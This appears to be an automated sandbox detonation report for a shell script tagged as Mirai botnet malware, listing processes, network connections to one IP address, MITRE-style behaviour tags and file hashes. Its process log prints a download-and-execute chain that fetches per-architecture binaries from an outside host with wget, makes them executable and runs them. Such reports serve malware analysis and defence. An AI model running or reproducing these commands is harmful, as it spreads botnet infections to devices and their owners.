/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tarm7]

/usr/bin/wget

[wget http://45.202.35.91/x86 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf x86]

/usr/bin/wget

[wget http://45.202.35.91/tarm6 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tarm6]

Network

Country Destination Domain Proto
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp

Files

/tmp/lib/dvrLocker

MD5 bb9275394716c60d1941432c7085ca13
SHA1 43f6e51ca69e70abb7d6cfd7f11f15df3fcc97cc
SHA256 3c0eb5de2946c558159a6b6a656d463febee037c17a1f605330e601cfcd39615
SHA512 047ec8451a8d35ac67c7ff26e145cfe5536d94ef1a7d280d2e70dc4c3ed7dfd1386a957e1b76f50c10429774df02964d48d50d6bb8debc2c9a3bcced833b125d

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-09 03:32

Reported

2024-11-09 03:34

Platform

debian9-mipsel-20240226-en

Max time kernel

60s

Max time network

65s

Command Line

[/tmp/becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049.sh]

Signatures

Mirai

botnet mirai

Mirai family

mirai

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/mkdir N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/lib/dvrLocker /tmp/becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049.sh N/A

Processes

/tmp/becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049.sh

[/tmp/becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049.sh]

/bin/ls

[ls -l /proc/1/exe]

/bin/ls

[ls -l /proc/10/exe]

/bin/ls

[ls -l /proc/105/exe]

/bin/ls

[ls -l /proc/11/exe]

/bin/ls

[ls -l /proc/115/exe]

/bin/ls

[ls -l /proc/116/exe]

/bin/ls

[ls -l /proc/12/exe]

/bin/ls

[ls -l /proc/13/exe]

/bin/ls

[ls -l /proc/14/exe]

/bin/ls

[ls -l /proc/142/exe]

/bin/ls

[ls -l /proc/149/exe]

/bin/ls

[ls -l /proc/15/exe]

/bin/ls

[ls -l /proc/16/exe]

/bin/ls

[ls -l /proc/166/exe]

/bin/ls

[ls -l /proc/17/exe]

/bin/ls

[ls -l /proc/18/exe]

/bin/ls

[ls -l /proc/19/exe]

/bin/ls

[ls -l /proc/2/exe]

/bin/ls

[ls -l /proc/20/exe]

/bin/ls

[ls -l /proc/21/exe]

/bin/ls

[ls -l /proc/22/exe]

/bin/ls

[ls -l /proc/23/exe]

/bin/ls

[ls -l /proc/239/exe]

/bin/ls

[ls -l /proc/24/exe]

/bin/ls

[ls -l /proc/3/exe]

/bin/ls

[ls -l /proc/323/exe]

/bin/ls

[ls -l /proc/326/exe]

/bin/ls

[ls -l /proc/328/exe]

/bin/ls

[ls -l /proc/330/exe]

/bin/ls

[ls -l /proc/334/exe]

/bin/ls

[ls -l /proc/36/exe]

/bin/ls

[ls -l /proc/37/exe]

/bin/ls

[ls -l /proc/374/exe]

/bin/ls

[ls -l /proc/376/exe]

/bin/ls

[ls -l /proc/386/exe]

/bin/ls

[ls -l /proc/390/exe]

/bin/ls

[ls -l /proc/4/exe]

/bin/ls

[ls -l /proc/486/exe]

/bin/ls

[ls -l /proc/491/exe]

/bin/ls

[ls -l /proc/5/exe]

/bin/ls

[ls -l /proc/532/exe]

/bin/ls

[ls -l /proc/533/exe]

/bin/ls

[ls -l /proc/6/exe]

/bin/ls

[ls -l /proc/674/exe]

/bin/ls

[ls -l /proc/688/exe]

/bin/ls

[ls -l /proc/689/exe]

/bin/ls

[ls -l /proc/69/exe]

/bin/ls

[ls -l /proc/691/exe]

/bin/ls

[ls -l /proc/693/exe]

/bin/ls

[ls -l /proc/694/exe]

/bin/ls

[ls -l /proc/695/exe]

/bin/ls

[ls -l /proc/696/exe]

/bin/ls

[ls -l /proc/698/exe]

/bin/ls

[ls -l /proc/7/exe]

/bin/ls

[ls -l /proc/70/exe]

/bin/ls

[ls -l /proc/71/exe]

/bin/ls

[ls -l /proc/72/exe]

/bin/ls

[ls -l /proc/73/exe]

/bin/ls

[ls -l /proc/74/exe]

/bin/ls

[ls -l /proc/76/exe]

/bin/ls

[ls -l /proc/77/exe]

/bin/ls

[ls -l /proc/78/exe]

/bin/ls

[ls -l /proc/79/exe]

/bin/ls

[ls -l /proc/8/exe]

/bin/ls

[ls -l /proc/82/exe]

/bin/ls

[ls -l /proc/9/exe]

/bin/rm

[rm -rf /tmp/lib/]

/bin/rm

[rm -rf /tmp/lib/dvrLocker]

/bin/mkdir

[mkdir /tmp/lib/]

/usr/bin/wget

[wget http://45.202.35.91/tmpsl -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tmpsl]

/usr/bin/wget

[wget http://45.202.35.91/tmips -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tmips]

/usr/bin/wget

[wget http://45.202.35.91/tarm -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tarm]

/usr/bin/wget

[wget http://45.202.35.91/tarm5 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tarm5]

/usr/bin/wget

[wget http://45.202.35.91/tppc -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tppc]

/usr/bin/wget

[wget http://45.202.35.91/tarm7 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tarm7]

/usr/bin/wget

[wget http://45.202.35.91/x86 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf x86]

/usr/bin/wget

[wget http://45.202.35.91/tarm6 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tarm6]

/bin/rm

[rm -rf /mnt/dvrLocker]

/usr/bin/wget

[wget http://45.202.35.91/tmpsl -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tmpsl]

/usr/bin/wget

[wget http://45.202.35.91/tmips -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tmips]

/usr/bin/wget

[wget http://45.202.35.91/tarm -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tarm]

/usr/bin/wget

[wget http://45.202.35.91/tarm5 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tarm5]

/usr/bin/wget

[wget http://45.202.35.91/tppc -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tppc]

/usr/bin/wget

[wget http://45.202.35.91/tarm7 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tarm7]

/usr/bin/wget

[wget http://45.202.35.91/x86 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf x86]

/usr/bin/wget

[wget http://45.202.35.91/tarm6 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tarm6]

/usr/bin/wget

[wget http://45.202.35.91/tmpsl -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tmpsl]

/usr/bin/wget

[wget http://45.202.35.91/tmips -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tmips]

/usr/bin/wget

[wget http://45.202.35.91/tarm -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tarm]

/usr/bin/wget

[wget http://45.202.35.91/tarm5 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tarm5]

/usr/bin/wget

[wget http://45.202.35.91/tppc -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tppc]

/usr/bin/wget

[wget http://45.202.35.91/tarm7 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tarm7]

/usr/bin/wget

[wget http://45.202.35.91/x86 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf x86]

/usr/bin/wget

[wget http://45.202.35.91/tarm6 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tarm6]

Network

Country Destination Domain Proto
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp

Files

/tmp/lib/dvrLocker

MD5 bb9275394716c60d1941432c7085ca13
SHA1 43f6e51ca69e70abb7d6cfd7f11f15df3fcc97cc
SHA256 3c0eb5de2946c558159a6b6a656d463febee037c17a1f605330e601cfcd39615
SHA512 047ec8451a8d35ac67c7ff26e145cfe5536d94ef1a7d280d2e70dc4c3ed7dfd1386a957e1b76f50c10429774df02964d48d50d6bb8debc2c9a3bcced833b125d